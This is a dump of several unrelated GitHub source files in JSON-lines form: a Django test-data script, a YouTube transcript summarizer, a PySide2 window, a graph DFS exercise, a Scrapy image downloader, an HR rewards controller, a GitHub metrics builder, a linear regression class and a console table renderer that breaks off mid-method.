ExtraSubscriptionType.objects.create(\r\n name=\"Spezialkäse Einheitsgrösse\",\r\n size=\"Einheitsgrösse\",\r\n description=\"Einmal pro Monat Überraschunskäse\",\r\n sort_order=1,\r\n category_id=extra_sub_cat1.id,\r\n visible=True,\r\n )\r\n ExtraSubBillingPeriod.objects.create(\r\n start_day=1,\r\n start_month=1,\r\n end_day=31,\r\n end_month=12,\r\n type_id=extra_sub_type1.id,\r\n cancel_day=30,\r\n cancel_month=9,\r\n price=120,\r\n )\r\n jm.ExtraSubscription.objects.create(\r\n active=True,\r\n canceled=False,\r\n activation_date=utils.timezone.now(),\r\n main_subscription_id=subscription_1.id,\r\n type_id=extra_sub_type1.id,\r\n )\r\n","repo_name":"juntagrico/juntagrico-custom-sub","sub_path":"juntagrico_custom_sub/management/commands/cs_generate_testdata.py","file_name":"cs_generate_testdata.py","file_ext":"py","file_size_in_byte":12785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12718208613","text":"from dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nimport replicate\nimport openai\nimport pytube\nimport json\n\n# Skip this part if we have a transcript already\ntotal_text = \"\"\nif not os.path.exists(\"transcript.txt\"):\n\n path = input(\"Enter the URL of the video:\")\n yt = pytube.YouTube(path)\n\n\n # 16kbps is the maximum bitrate for the openai whisper model\n print(\"Downloading audio...\")\n audio = yt.streams.filter(only_audio=True).first()\n\n # download it into a temporary file\n audio.download(output_path=\".\", filename=\"audio.mp3\")\n\n print(\"Preparing transcript...\")\n output = replicate.run(\n \"carnifexer/whisperx:1e0315854645f245d04ff09f5442778e97b8588243c7fe40c644806bde297e04\",\n input={\"audio\": open(\"audio.mp3\", \"rb\")}\n )\n\n # Convert the output to a json dict \n array = json.loads(output)\n\n for segment in array:\n total_text += segment[\"text\"] + \" \"\n\n with open(\"transcript.txt\", \"w\") as f:\n f.write(total_text)\nelse:\n with open(\"transcript.txt\", \"r\") as f:\n total_text = f.read()\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ncontext = input(\"Enter the context of the video: \")\n\ndef summarizer(batch, size = True):\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You will summarize any text provided to you in bullet points\" + \"in 3 sentences or less.\" if size else \".\" + \"The context is: \" + context},\n {\"role\": \"user\", \"content\": batch}\n ]\n )\n return completion.choices[0].message.content\n\n# Actual summarization now\nwindow_size = 500\ntext_windows = [total_text[i:i+window_size] for i in range(0, len(total_text), window_size)]\n\nwindow_summaries = [summarizer(window_text) for window_text in text_windows]\nprint(window_summaries)\n\ncombined_summary = \" \".join(window_summaries)\n\nfinal_summary = summarizer(combined_summary, size=False)\n\nwith open(\"summary.txt\", \"w\") as f:\n f.write(final_summary)","repo_name":"idrizp/summarizer","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18238188076","text":"from PySide2.QtWidgets import QMainWindow,QWidget,QPushButton,QApplication,QPlainTextEdit\nfrom PySide2.QtGui import QFont\nimport sys\n\nclass MD_UI(QWidget):\n def __init__(self):\n super().__init__()\n self.resize(600,600)\n self.setWindowTitle(\"MD_get_data_tool\")\n msg_font=QFont(\"Arial\", 16, QFont.Black)\n self.msg = QPlainTextEdit(self)\n self.msg.setGeometry(10,10,580,520)\n self.msg.setFont(msg_font)\n\n\n Btn_font =QFont(\"Arial\", 20, QFont.Black)\n\n self.btn_start = QPushButton(self)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.setGeometry(10, 540, 180, 50)\n self.btn_start.setText(\"start\")\n self.btn_start.setFont(Btn_font)\n\n\n self.btn_clear = QPushButton(self)\n self.btn_clear.setObjectName(\"btn_clear\")\n self.btn_clear.setGeometry(210, 540, 180, 50)\n self.btn_clear.setText(\"clear\")\n self.btn_clear.setFont(Btn_font)\n\n\n self.btn_stop = QPushButton(self)\n self.btn_stop.setObjectName(\"btn_end\")\n self.btn_stop.setGeometry(410, 540, 180, 50)\n self.btn_stop.setText(\"stop\")\n self.btn_stop.setFont(Btn_font)\n\n\n def test(self):\n print(\"123456\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ui = MD_UI()\n ui.show()\n sys.exit(app.exec_())","repo_name":"Huan717/MachineInfomationBoard","sub_path":"Auto_UI/MDUI.py","file_name":"MDUI.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16766524110","text":"import sys\n\nsys.stdin = open('sample_input.txt', encoding='utf-8')\n\n\ndef dfs(v): # 재귀 이용\n visited[v] = True # 방문처리\n global result\n if v == g: # 현재노드(v)와 도착점이 같다면\n result = 1 # 결과값을 1로 변경 후 종료\n return result\n for next_v in graph[v]: # 현재 정점과 인접한 모든 정점\n if not visited[next_v]: # 아직 방문하지 않았다면\n dfs(next_v) # 인접 정점 방문\n\n\nfor t in range(1, int(input()) + 1):\n v, e = map(int,input().split()) # v: 노드의 수 e: 간선의 수\n graph = [[] for _ in range(v+1)] # graph 1부터 사용하므로 +1\n visited = [False] * (v+1) # 방문처리 리스트\n result = 0 # 결과의 기본값은 0\n for _ in range(e):\n v1, v2 = map(int,input().split())\n graph[v1].append(v2) # 방향 그래프\n s, g = map(int, input().split()) # s: 시작점 g: 도착점\n\n dfs(s) # 시작점부터 dfs시작\n print(f'#{t} {result}')","repo_name":"yooooonzzzzzang/Algorithm","sub_path":"04_Stack1_실습/07_4871_그래프경로/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11563803246","text":"import sys\nprint(sys.path) # for debugging\nimport numpy as np\nfrom deepposekit.models import load_model\nfrom deepposekit.io import DataGenerator, VideoReader, VideoWriter\nimport pandas as pd\nimport os\n\n# parse input arguments\nvideo, model_name, skeleton, output = sys.argv[1:]\n\n# for debugging\n# video = r'Z:\\loco\\obstacleData\\sessions\\200308_000\\run.mp4'\n# model_name = r'D:\\github\\locomotionAnalysis\\tracking\\deepposekit\\models\\model_run_StackedDenseNet.h5'\n# skeleton = r'D:\\github\\locomotionAnalysis\\tracking\\label\\training_sets\\skeleton_run.csv'\n# output = 'trackedFeatures_run.csv'\n\n# settings\nbatch_size = 16\nmax_frames = None # set to None unless debugging\n# max_frames = 100000 # set to None unless debugging\n\n# load model and video\nmodel = load_model(model_name)\nreader = VideoReader(video, batch_size=batch_size, gray=True, frame_size=model.input_shape)\n\n# predict\nmax_batches = max_frames//batch_size if max_frames else None\npredictions = model.predict(reader, verbose=1, steps=max_batches)\nreader.close()\n\n# save data\nfile_name = os.path.join(os.path.split(video)[0], output)\nfeatures = list(pd.read_csv(skeleton).name)\ncolumns = np.repeat(features, 3)\ndata = pd.DataFrame(columns=columns, index=np.arange(predictions.shape[0]))\ndata[:] = np.reshape(predictions, (predictions.shape[0], -1))\ndata.to_csv(file_name)","repo_name":"richard-warren/locomotionAnalysis","sub_path":"tracking/deepposekit/analyze_video.py","file_name":"analyze_video.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6680040933","text":"# Exceptions\n\n# Using LBYL (Look Before You Leap)\ndef divideFirstMethod(x, y):\n if (y != 0):\n return x / y\n else:\n return 0\n\n\n# Using EAFP (Easier to Ask Forgiveness than Permission):\ndef divideSecondMethod(x, y): \n try:\n return x / y\n except:\n return 0\n\n\n# Throw new Arithmetic Exception\ndef divideThirdMethod(x, y): \n try: \n return x / y\n except ZeroDivisionError as e:\n print(\"Did you try to divide by zero? {}\".format(e))\n\n\n# Not using exceptions\ndef divide(x, y):\n return x / y\n\n\n# Value\nx = 45\ny = 35\nz = 0\n\n\n# Exception handle\ntry:\n print(str(x) + \"/\" + str(y) + \"is:\")\n print(divideFirstMethod(x, y))\n print(divideSecondMethod(x, y))\n print(divideThirdMethod(x, y))\n print(divide(x, y))\n\n print(str(x) + \"/\" + str(z) + \"is:\")\n print(divideFirstMethod(x, z))\n print(divideSecondMethod(x, z))\n print(divideThirdMethod(x, z))\n print(divide(x, z))\n a = 0 / 0\nexcept ZeroDivisionError as e:\n print(e)\n print(\"Something went wrong, isn't it?\")\nfinally:\n print(\"Well done! You did it! Program still work, no error crash!\")\n\n\n# End of file\nprint()\ninput(\"Press Enter to continue...\")","repo_name":"FrogGreen/Python","sub_path":"018. Exceptions/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23425218361","text":"def search(cost,farm,goal):\r\n\ttime = 0.0\r\n\tspeed = 2.0\r\n\twhile time + goal / speed > time + goal / (speed + farm) + cost / speed:\r\n\t\ttime += cost / speed\r\n\t\tspeed += farm\r\n\treturn str(time + goal / speed)\r\n# def search(speed,cost,farm,goal,elapsed):\r\n# \tt = cost / speed + search(speed + farm,cost,farm,goal) + elapsed\r\n# \tif goal / speed > t:\r\n# \t\treturn t\r\n# \treturn t + goal\r\nwith open(\"B--small-attempt0.in\") as f:\r\n\twith open(\"result.txt\",\"w\") as out:\r\n\t\tn = int(f.readline().strip())\r\n\t\tfor i in range(n):\r\n\t\t\ts = f.readline().strip().split()\r\n\t\t\tout.write(\"Case #%d: %s\\n\" % (i + 1,str(search(float(s[0]),float(s[1]),float(s[2])))))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2548.py","file_name":"2548.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21282003843","text":"\"\"\"Helper classes describing the objects that are not a 'submittable' in the USI model\"\"\"\n\nfrom typing import List\n\n\nclass Component:\n \"\"\"The base component class, with the main purpose of adding a __repr__ function to all components\"\"\"\n\n def __repr__(self):\n \"\"\"Generate a printable string with class name and attributes\"\"\"\n return \"{}({})\".format(self.__class__.__name__,\n \", \".join([\"{}={!r}\".format(k, getattr(self, k)) for k in self.__dict__]))\n\n\nclass DataFile(Component):\n \"\"\"Attributes of a DataFile object\n :param name, string, file name\n :param checksum, string, checksum hash of the file\n :param checksum_method, string, the method used to calculate the checksum\n :param ftp_location, string, the FTP path to download the file\n :param read_type, string, the type of sequencing read, e.g. read1/read2/index1\n \"\"\"\n def __init__(self, **kwargs):\n self.name: str = kwargs.get(\"name\")\n self.checksum: str = kwargs.get(\"checksum\")\n self.checksum_method: str = kwargs.get(\"checksum_method\")\n self.ftp_location: str = kwargs.get(\"ftp_location\")\n self.read_type: str = kwargs.get(\"read_type\")\n\n\nclass Contact(Component):\n \"\"\"Attributes of a contact\n :param firstName, string, person first name\n :param lastName, string, person last name\n :param middleInitials, string, person middle initials\n :param email, string, email address\n :param affiliation, string, affiliated institute\n :param address, string, address of the institute\n :param phone, string, phone number\n :param roles, list of role terms\n :param fax, string, fax number\n :param orcidId, string, ORCID number\n \"\"\"\n def __init__(self, **kwargs):\n self.firstName: str = kwargs.get(\"firstName\")\n self.lastName: str = kwargs.get(\"lastName\")\n self.email: str = kwargs.get(\"email\")\n self.affiliation: str = kwargs.get(\"affiliation\")\n self.address: str = kwargs.get(\"address\")\n self.phone: str = kwargs.get(\"phone\")\n self.roles: List[str] = kwargs.get(\"roles\", [])\n self.middleInitials: str = kwargs.get(\"middleInitials\")\n self.fax: str = kwargs.get(\"fax\")\n self.orcidId: str = kwargs.get(\"orcidId\")\n\n\nclass Publication(Component):\n \"\"\"Attributes of a publication\n :param articleTitle, string, title of the publication\n :param authors, string, list of the author names\n :param pubmedId, string, PubMed ID of the publication\n :param doi, string, DOI of the publication\n :param publicationStatus, string, status term of the publication\n \"\"\"\n def __init__(self, **kwargs):\n self.articleTitle: str = kwargs.get(\"articleTitle\")\n self.authors: str = kwargs.get(\"authors\")\n self.pubmedId: str = kwargs.get(\"pubmedId\")\n self.doi: str = kwargs.get(\"doi\")\n self.publicationStatus: str = kwargs.get(\"publicationStatus\")\n\n\nclass Attribute(Component):\n \"\"\"Attributes of an attribute\n :param value, string, the attribute value, e.g. ontology label\n :param unit, Unit class object describing the unit of the value\n :param term_source, string, the source ontology of the term\n :param term_accession, string, the ontology ID of the term\n \"\"\"\n def __init__(self, **kwargs):\n self.value: str = kwargs.get(\"value\")\n self.unit: Unit = kwargs.get(\"unit\")\n self.term_source: str = kwargs.get(\"term_source\")\n self.term_accession: str = kwargs.get(\"term_accession\")\n\n\nclass Unit(Component):\n \"\"\"Attributes of a unit\n :param value, string, the unit term, e.g. hour\n :param unit_type, string, the type of unit, e.g. time unit\n :param term_source, string, the source ontology of the unit term\n :param term_accession, string, the ontology ID of the unit term\n \"\"\"\n def __init__(self, **kwargs):\n self.value: str = kwargs.get(\"value\")\n self.unit_type: str = kwargs.get(\"unit_type\")\n self.term_source: str = kwargs.get(\"term_source\")\n self.term_accession: str = kwargs.get(\"term_accession\")\n","repo_name":"ebi-gene-expression-group/common-datamodel","sub_path":"datamodel/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9038431114","text":"import os\nimport scrapy\nimport pandas as pd\nimport numpy as np\nfrom scrapy.loader import ItemLoader\nfrom equippo.items import EquippoItem\n\n\nclass ImagedownloaderSpider(scrapy.Spider):\n name = 'imagedownloader'\n print(\"Image Downloader Constructor Called !!!\")\n final_df = pd.read_excel('./scrapy_equippo.xlsx')\n all_files = os.listdir('/home/faizan/web_scraping/Cognitia/equippo/images')\n print(\"Done reading\")\n\n def start_requests(self):\n yield scrapy.Request(url='https://www.google.com/', callback=self.parse_main_page,\n dont_filter=True)\n\n def parse_main_page(self, response):\n total_length = len(self.final_df)\n all_columns = list(self.final_df.columns)\n for i in range(0, total_length):\n for k in range(1, 500):\n if 'Image Link ' + str(k) in all_columns:\n file_name = self.final_df['Image ' + str(k)].iloc[i]\n image_link = self.final_df['Image Link ' + str(k)].iloc[i]\n if file_name is not np.nan and file_name != '' and file_name not in self.all_files:\n loader = ItemLoader(item=EquippoItem())\n loader.add_value('image_urls', image_link)\n loader.add_value('file_name', file_name)\n yield loader.load_item()\n else:\n break\n","repo_name":"CognitiaAI/equippo-scraping","sub_path":"equippo/spiders/imagedownloader.py","file_name":"imagedownloader.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38040512848","text":"# different types of blurring\nimport cv2 as cv\n\nimg = cv.imread('cats.jpg')\ncv.imshow('normal', img)\n\n# Gaussian Blur\ngaus = cv.GaussianBlur(img, (7,7), 0)\ncv.imshow('gaussian', gaus)\n\n# Median Blur\nmedian = cv.medianBlur(img, 7)\ncv.imshow('median', median)\n\n# Bilateral blur\nbilat = cv.bilateralFilter(img, 9, 75, 75)\ncv.imshow('bilateral', bilat)\n\n\ncv.waitKey(0)","repo_name":"harry10-git/OpenCV-FCC","sub_path":"week3/blurs.py","file_name":"blurs.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34026922494","text":"\"\"\" This is the controller of the /rewards endpoint\n\nThe following functions are called from here: GET, POST.\n\"\"\"\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy import exists\nfrom databasesetup import create_session, Employee\nfrom models.employee_reward_api_model import EmployeeRewardApiModel\nfrom models.employee_response import EmployeeResponse\nimport requests\nimport logging\n\nlogging.basicConfig(filename='./log.txt', format='%(asctime)s :: %(name)s :: %(message)s')\nlogger = logging.getLogger(__name__)\n\n\ndef get():\n session = create_session()\n employee_collection = []\n info = \"Get Employees - Found the following employees - \"\n\n try:\n if not session.query(Employee).first():\n session.rollback()\n logger.warning(\"Get Employees - No employees exist in the system\")\n return {'error message': 'No employees exist in the system'}, 400\n\n all_employee_objects = session.query(Employee).all()\n\n for employee_object in all_employee_objects:\n employee = EmployeeRewardApiModel(employee_id=employee_object.id,\n name=employee_object.first_name + ' ' + employee_object.last_name,\n phones=employee_object.phones,\n orders=employee_object.orders)\n if employee_object.phones != 0 and employee_object.orders != 0:\n employee_collection.append(employee)\n\n except SQLAlchemyError:\n session.rollback()\n error_message = 'Error while retrieving all employee rewards'\n logger.warning(\"Employees.py Get - \" + error_message)\n return {'error_message': error_message}, 400\n\n # CLOSE\n session.close()\n logger.warning(info)\n if not employee_collection:\n logger.warning(\"Get Employees - No employees that can receive rewards are in the system\")\n return {'error message': 'No employees that can receive rewards are in the system'}, 400\n else:\n return EmployeeResponse(employee_collection).to_dict()\n\n\ndef post(employee):\n \"\"\"\n :param employee:\n :return:\n\n 1. check employee exists and grab it\n 2. add information to that employee\n 3. for each id in the array check for status from manufacturing\n 4. if low/medium increment\n 5. increment by 1.\n \"\"\"\n session = create_session()\n\n try:\n # Check if Employee exists\n if not session.query(exists().where(Employee.id == employee['employeeId'])).scalar():\n error_message = 'This employee does not exist in the system yet. ' \\\n 'Please use employees POST to add them as a new employee'\n logger.warning(\"rewards.py POST - \"\n \"The employee does not exist in the system\")\n return {'error_message': error_message}, 400\n\n employee_object = session.query(Employee).get(employee['employeeId'])\n if employee['replace']:\n return {'message': 'No rewards were counted for the employee {0}'.format(employee['employeeId'])}\n else:\n for serial_id in employee['serialIds']:\n try:\n phone_payload = requests.get(\"http://vm343b.se.rit.edu:5000/inventory/phones/{0}\".format(str(serial_id)))\n phone = phone_payload.json()\n except:\n session.rollback()\n error_message = 'Error while information from inventory with phone_serial_id: {0}'.format(str(serial_id))\n logger.warning(error_message)\n return {'error_message': error_message}, 400\n\n if phone[0]['fields']['modelId'] == 2 or phone[0]['fields']['modelId'] == 3:\n employee_object.phones += + 1\n employee_object.orders += 1\n\n except:\n session.rollback()\n error_message = 'Error while modifying employee base in rewards.py'\n logger.warning(\"rewards.py employees POST - \"\n \"Error while modifying the employee:\")\n return {'error_message': error_message}, 400\n\n return_message = \"Employee {0}'s count for phones has incremented now is {1} and now has {2} \" \\\n \"eligible orders\".format(employee['employeeId'], employee_object.phones, employee_object.orders)\n\n session.commit()\n session.close()\n return {'message': return_message}, 200\n","repo_name":"dfehrenbach/Swen343_Human_Resources","sub_path":"hr/controllers/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42842937572","text":"### Author: Jialin Cui \n### Refactored by Anh Nguyen\nimport os\nimport pandas as pd\nimport numpy as np \nfrom sklearn.mixture import GaussianMixture\nimport matplotlib.pyplot as plt\n\nclass Metrics():\n def __init__(self, path_to_file):\n self._ds = pd.read_csv(path_to_file)\n # remove leading and trailing space in column names\n self._ds.columns = self._ds.columns.str.strip()\n self._pop_lang = set(['Python','JavaScript','Java','TypeScript','Go','C++','Ruby','PHP','C#','C'])\n self._langs = ['AlanguageInfo','BlanguageInfo','ClanguageInfo','DlanguageInfo']\n\n def get_datatable(self):\n return self.dataframe\n\n ## extract language numbears and popular language size\n def _getLanguageNumberAndSize(self):\n for index, row in self._ds.iterrows():\n for item in self._langs:\n col1 = item + 'count'\n col2 = item + 'size'\n ls = str(self._ds.at[index, item])\n lcount = set()\n lsize = 0\n if ls != 'nan':\n ls = ls.split(';')\n for l in ls:\n lname, lsize = l.split(':')\n lname = lname.strip()\n lsize = int(lsize.strip())\n lcount.add(lname)\n if lname in self._pop_lang:\n lsize += lsize\n self._ds.at[index, col2] = lsize\n self._ds.at[index, col1] = len(lcount)\n\n def constructMetricsTable(self):\n self._getLanguageNumberAndSize()\n self.dataframe = self._ds[['GitHub']].copy(deep=True)\n # # lifespan\n self.dataframe['lifespan'] = self._ds['lifeSpan']\n\n # RestrictedContributionsCount + CommitContributions = A\n commits = ['RestrictedContributionsCount','CommitContributions'] \n self.dataframe['A'] = self._ds[commits].sum(axis=1)\n\n # commitComments + issueComments + gistComments + repositoryDiscussionComments + repositoryDiscussions = B\n comments = ['commitComments','issueComments','gistComments','repositoryDiscussionComments','repositoryDiscussions']\n self.dataframe['B'] = self._ds[comments].sum(axis=1)\n\n # PullRequestReviewContributions + pullRequests = C\n PR = ['PullRequestReviewContributions','pullRequests']\n self.dataframe['C'] = self._ds[PR].sum(axis=1)\n\n # Issues + gists + projects = D\n issues = ['issues','gists','projects']\n self.dataframe['D'] = self._ds[issues].sum(axis=1)\n\n # A lang numbers + C langs numbers = E\n lang_AC_num = ['AlanguageInfocount', 'ClanguageInfocount']\n self.dataframe['E'] = self._ds[lang_AC_num].sum(axis=1)\n\n # A lang size + C lang size = F\n lang_AC_size = ['AlanguageInfosize', 'ClanguageInfosize']\n self.dataframe['F'] = self._ds[lang_AC_size].sum(axis=1)\n\n # B lang numbers + D langs numbers = G\n lang_BD_num = ['BlanguageInfocount', 'DlanguageInfocount']\n self.dataframe['G'] = self._ds[lang_BD_num].sum(axis=1)\n\n # B lang size + D lang size = H\n lang_BD_size = ['BlanguageInfosize', 'DlanguageInfosize']\n self.dataframe['H'] = self._ds[lang_BD_size].sum(axis=1)\n\n # A + B + C + D count = I\n ABCD_count = ['repoACount', 'repoBCount', 'repoCCount', 'repoDCount']\n self.dataframe['I'] = self._ds[ABCD_count].sum(axis=1)\n\n # A fork,star,watch + C fork,star,watch = J\n AC_fsw = ['forkACount', 'stargazerACount', 'Awatchers',\n 'forkCCount', 'stargazerCCount', 'Cwatchers']\n self.dataframe['J'] = self._ds[AC_fsw].sum(axis=1)\n\n # B fork,star,watch + D fork,star,watch = K\n BD_fsw = ['forkBCount', 'stargazerBCount', 'Bwatchers',\n 'forkDCount', 'stargazerDCount', 'Dwatchers']\n self.dataframe['K'] = self._ds[BD_fsw].sum(axis=1)\n\n # A size + C size = L\n AC_size = ['repoASize', 'repoCSize']\n self.dataframe['L'] = self._ds[AC_size].sum(axis=1)\n\n # B size + D size = M\n BD_size = ['repoBSize', 'repoDSize']\n self.dataframe['M'] = self._ds[BD_size].sum(axis=1)\n\n \n","repo_name":"anguyen216/pyqt_UI","sub_path":"app/data/construct_metrics.py","file_name":"construct_metrics.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14698347138","text":"import numpy as np\r\n\r\n\r\nclass LinearRegression:\r\n def __init__(self, history=True):\r\n self.history = history\r\n\r\n def fit(self, X, y, alpha=0.01, iterations=1000):\r\n # Add column 1 to X\r\n X = np.array([[x for x in X[i]]+[1] for i in range(X.shape[0])])\r\n # Init theta to 0\r\n theta = np.zeros((X.shape[1],1))\r\n J_history = []\r\n\r\n # Start gradient descent \r\n for iter in range(iterations):\r\n delta = self.calculGradient(X, y, theta)\r\n theta = theta - alpha*delta\r\n if self.history:\r\n J_history.append(self.calculCost(X, y, theta))\r\n self.theta = theta\r\n return J_history\r\n \r\n def predict(self, X):\r\n # Add column 1 to X\r\n X = np.array([[x for x in X[i]]+[1] for i in range(X.shape[0])])\r\n return np.dot(X,self.theta).reshape(X.shape[0])\r\n\r\n\r\n def calculGradient(self, X, y, theta):\r\n m = len(y)\r\n predictions = np.dot(X,theta).reshape(m)\r\n# delta = [sum([(predictions[i] - y[i])*X[i,xi] for i in range(m)])/m for xi in range(X.shape[1])]\r\n delta = np.dot((predictions - y), X)\r\n delta = np.array(delta).reshape(theta.shape)\r\n return delta\r\n\r\n def calculCost(self, X, y, theta):\r\n m = len(y)\r\n predictions = np.dot(X,theta).reshape(m)\r\n sqrErrors = np.square(predictions - y)\r\n J = sum(sqrErrors)/(2*m)\r\n return J\r\n\r\n def getCoefficients(self):\r\n return self.theta\r\n","repo_name":"Prevost-Guillaume/ML-Algorithms","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3069329185","text":"# python 3.5\nimport sys\nimport math\nfrom collections import OrderedDict\n\nMAX_TRIES = 100000\n\nclass Cell:\n def __init__(self, text, padding=0):\n self.text = str(text)\n self.padding = padding\n self.lines = [\" \"*self.padding + self.text + \" \"*self.padding]\n self.total_chars = len(self.text) + 2*self.padding\n self.depth = len(self.lines)\n\n def get_depth(self):\n return self.depth\n\n def get_line(self, index):\n try:\n return self.lines[index]\n except:\n return \"\"\n\n def get_width(self):\n return len(self.lines[0])\n\n def remove_depth(self):\n self.depth -= 1\n max_chars_per_line = math.ceil(self.total_chars / self.depth)\n for index,_ in enumerate(self.lines):\n self.lines[index] = \" \"*self.padding + self.text[index*max_chars_per_line: (index+1)*max_chars_per_line] + \" \"*self.padding\n self.lines = self.lines[:-1]\n return self.depth\n\n def add_depth(self):\n self.depth += 1\n self.lines.append(None)\n # does not include padding as a char in a line here\n max_chars_per_line = math.ceil(self.total_chars / self.depth)\n for index,_ in enumerate(self.lines):\n self.lines[index] = \" \"*self.padding + self.text[index*max_chars_per_line: (index+1)*max_chars_per_line] + \" \"*self.padding\n return self.depth\n\nclass Column(Cell):\n def __init__(self, text, padding=0):\n super().__init__(text, padding=padding)\n self.daughter_cells = []\n self._index = 0\n\n def add_cell(self, text):\n self.daughter_cells.append(Cell(text))\n\n def add_depth(self):\n # super().add_depth()\n for c in self.daughter_cells: \n c.add_depth()\n\n def add_my_depth(self):\n return super().add_depth()\n\n def get_depth(self):\n # returns the column's deepest depth value\n col_depth = super().get_depth()\n for c in self.daughter_cells:\n col_depth = max(col_depth, c.get_depth())\n return col_depth\n\n def get_width(self):\n # returns the colum's largest width value\n max_width = super().get_width()\n for c in self.daughter_cells:\n max_width = max(max_width, c.get_width())\n return max_width\n\n def get_my_width(self):\n return super().get_width()\n\n def get_total_daughters(self):\n return len(self.daughter_cells)\n\n def get_cell(self, index):\n try:\n return self.daughter_cells[index]\n except:\n return Cell(\"\")\n\nclass Table():\n '''\n data = {\n key1: [data1, data2, data3],\n key2: [data4, data5, data6]\n }\n\n key1 key2\n\n data1 data4\n data2 data5\n data3 data6\n\n '''\n\n def __init__(self, data, max_total_width=162, padding=0, fast_mode=False):\n self.columns = []\n self.fast_mode = fast_mode\n # populate columns\n # then add them to the table\n for key, value in data.items():\n col = Column(key, padding=padding)\n for datax in value:\n col.add_cell(datax)\n self.columns.append(col)\n\n # adjust sizing\n tries = 0\n current_total_width = 1000000001 # a billione\n\n # fast mode\n # assume all data is similar, and use the 0th\n # row as a model to assume the rest of the tbale\n min_table_width = 2*(len(self.columns)) + 1\n if max_total_width < min_table_width:\n print(\"ERROR: minimum table width for this dataset is %d. Will generate this size instead.\" % (min_table_width))\n max_total_width = min_table_width\n\n if self.fast_mode:\n while current_total_width > max_total_width:\n tries += 1\n max_cell_value = 0 # starts at 0 grows to max width\n max_col_index = 0 # i\n max_cell_index = -1 # -1 or 0\n\n for i, col in enumerate(self.columns):\n header_title_width = col.get_my_width()\n row_0_cell_width = col.daughter_cells[0].get_width()\n\n if header_title_width > max_cell_value:\n max_cell_index = -1\n max_col_index = i\n max_cell_value = header_title_width\n\n if row_0_cell_width > max_cell_value:\n max_cell_index = 0\n max_col_index = i\n max_cell_value = row_0_cell_width\n\n if max_cell_index == -1:\n # add depth to just the title\n self.columns[max_col_index].add_my_depth()\n else:\n # add depth to everything\n self.columns[max_col_index].add_depth()\n\n current_total_width = self.get_current_width()\n if tries >= MAX_TRIES:\n print(\"ERROR: Could not make table to desired width. Attempts tried: %d\" % (tries))\n break\n\n else:\n # comprehensive mode\n # find largest cell, shrink it\n while current_total_width > max_total_width:\n cells_to_update = [] # list of tuples: col index, cell index. -1 cell index == the column header itself\n tries += 1\n # find column with largest entry stored at max_index\n # that has \n max_cell_width = 0\n\n for i, col in enumerate(self.columns):\n col_my_width = col.get_my_width()\n\n if col_my_width > max_cell_width:\n cells_to_update = [(i, -1)]\n max_cell_width = col_my_width\n\n elif col_my_width == max_cell_width:\n cells_to_update.append((i, -1))\n\n for j, cell in enumerate(col.daughter_cells):\n cell_width = cell.get_width()\n\n if cell_width > max_cell_width:\n cells_to_update = [(i, j)]\n max_cell_width = cell_width\n\n elif cell_width == max_cell_width:\n cells_to_update.append((i, j))\n \n\n for col_index, cell_index in cells_to_update:\n if cell_index == -1:\n self.columns[col_index].add_my_depth()\n else:\n d = self.columns[col_index].get_cell(cell_index).add_depth()\n\n current_total_width = self.get_current_width()\n if tries >= MAX_TRIES:\n print(\"ERROR: Could not make table to desired width. Attempts tried: %d\" % (tries))\n break\n \n\n def get_current_width(self):\n borders = len(self.columns) + 1\n tally = 0\n for col in self.columns:\n tally += col.get_width()\n return borders + tally\n\n\n def show(self):\n # DEFINE CONSTANTS\n TOP_LEFT = '\\u250C'\n TOP_RIGHT = '\\u2510'\n BOTTOM_LEFT = '\\u2514'\n BOTTOM_RIGHT = '\\u2518'\n HORIZONTAL = '\\u2500'\n VERTICAL = '\\u2502'\n CROSS = '\\u253C'\n\n TOP_PROTRUDE = '\\u252C' #(T)\n LEFT_PROTRUDE = '\\u251C'\n RIGHT_PROTRUDE = '\\u2524'\n BOTTOM_PROTRUDE = '\\u2534'\n\n # print top line \n print(TOP_LEFT, end='')\n for index, col in enumerate(self.columns):\n print(HORIZONTAL * col.get_width(), end='')\n if index + 1 == len(self.columns):\n print(TOP_RIGHT)\n else:\n print(TOP_PROTRUDE, end='')\n\n # max depth of the keys\n 